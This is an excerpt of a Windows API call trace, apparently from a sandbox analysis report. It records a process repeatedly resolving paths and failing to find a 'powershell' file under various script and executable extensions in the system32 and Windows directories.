	[0561.453] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0561.454] SetErrorMode (uMode=0x1) returned 0x1
	[0561.454] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.462] SetErrorMode (uMode=0x1) returned 0x1
	[0561.463] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0561.464] SetErrorMode (uMode=0x1) returned 0x1
	[0561.464] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.471] SetErrorMode (uMode=0x1) returned 0x1
	[0561.473] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0561.473] SetErrorMode (uMode=0x1) returned 0x1
	[0561.473] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.482] SetErrorMode (uMode=0x1) returned 0x1
	[0561.483] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0561.483] SetErrorMode (uMode=0x1) returned 0x1
	[0561.483] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.491] SetErrorMode (uMode=0x1) returned 0x1
	[0561.493] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0561.493] SetErrorMode (uMode=0x1) returned 0x1
	[0561.493] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.062] SetErrorMode (uMode=0x1) returned 0x1
	[0563.063] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0563.063] SetErrorMode (uMode=0x1) returned 0x1
	[0563.064] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.073] SetErrorMode (uMode=0x1) returned 0x1
	[0563.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.074] SetErrorMode (uMode=0x1) returned 0x1
	[0563.074] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.075] SetErrorMode (uMode=0x1) returned 0x1
	[0563.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.075] SetErrorMode (uMode=0x1) returned 0x1
	[0563.075] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.075] SetErrorMode (uMode=0x1) returned 0x1
	[0563.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.076] SetErrorMode (uMode=0x1) returned 0x1
	[0563.076] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.076] SetErrorMode (uMode=0x1) returned 0x1
	[0563.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.076] SetErrorMode (uMode=0x1) returned 0x1
	[0563.076] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.077] SetErrorMode (uMode=0x1) returned 0x1
	[0563.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.077] SetErrorMode (uMode=0x1) returned 0x1
	[0563.077] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.077] SetErrorMode (uMode=0x1) returned 0x1
	[0563.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.078] SetErrorMode (uMode=0x1) returned 0x1
	[0563.078] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.078] SetErrorMode (uMode=0x1) returned 0x1
	[0563.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.078] SetErrorMode (uMode=0x1) returned 0x1
	[0563.078] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.079] SetErrorMode (uMode=0x1) returned 0x1
	[0563.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.079] SetErrorMode (uMode=0x1) returned 0x1
	[0563.079] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.079] SetErrorMode (uMode=0x1) returned 0x1
	[0563.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.080] SetErrorMode (uMode=0x1) returned 0x1
	[0563.080] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.080] SetErrorMode (uMode=0x1) returned 0x1
	[0563.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.080] SetErrorMode (uMode=0x1) returned 0x1
	[0563.080] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.081] SetErrorMode (uMode=0x1) returned 0x1
	[0563.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.081] SetErrorMode (uMode=0x1) returned 0x1
	[0563.081] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.081] SetErrorMode (uMode=0x1) returned 0x1
	[0563.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.081] SetErrorMode (uMode=0x1) returned 0x1
	[0563.082] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.082] SetErrorMode (uMode=0x1) returned 0x1
	[0563.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.082] SetErrorMode (uMode=0x1) returned 0x1
	[0563.082] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.082] SetErrorMode (uMode=0x1) returned 0x1
	[0563.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.083] SetErrorMode (uMode=0x1) returned 0x1
	[0563.083] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.083] SetErrorMode (uMode=0x1) returned 0x1
	[0563.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0563.083] SetErrorMode (uMode=0x1) returned 0x1
	[0563.083] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.084] SetErrorMode (uMode=0x1) returned 0x1
	[0563.084] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.084] SetErrorMode (uMode=0x1) returned 0x1
	[0563.084] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.084] SetErrorMode (uMode=0x1) returned 0x1
	[0563.085] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.085] SetErrorMode (uMode=0x1) returned 0x1
	[0563.085] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.085] SetErrorMode (uMode=0x1) returned 0x1
	[0563.085] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.085] SetErrorMode (uMode=0x1) returned 0x1
	[0563.085] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.086] SetErrorMode (uMode=0x1) returned 0x1
	[0563.086] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.086] SetErrorMode (uMode=0x1) returned 0x1
	[0563.086] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.086] SetErrorMode (uMode=0x1) returned 0x1
	[0563.086] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.087] SetErrorMode (uMode=0x1) returned 0x1
	[0563.087] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.087] SetErrorMode (uMode=0x1) returned 0x1
	[0563.087] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.087] SetErrorMode (uMode=0x1) returned 0x1
	[0563.087] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.087] SetErrorMode (uMode=0x1) returned 0x1
	[0563.088] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.088] SetErrorMode (uMode=0x1) returned 0x1
	[0563.088] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.088] SetErrorMode (uMode=0x1) returned 0x1
	[0563.088] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.088] SetErrorMode (uMode=0x1) returned 0x1
	[0563.088] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.089] SetErrorMode (uMode=0x1) returned 0x1
	[0563.089] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.089] SetErrorMode (uMode=0x1) returned 0x1
	[0563.089] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.089] SetErrorMode (uMode=0x1) returned 0x1
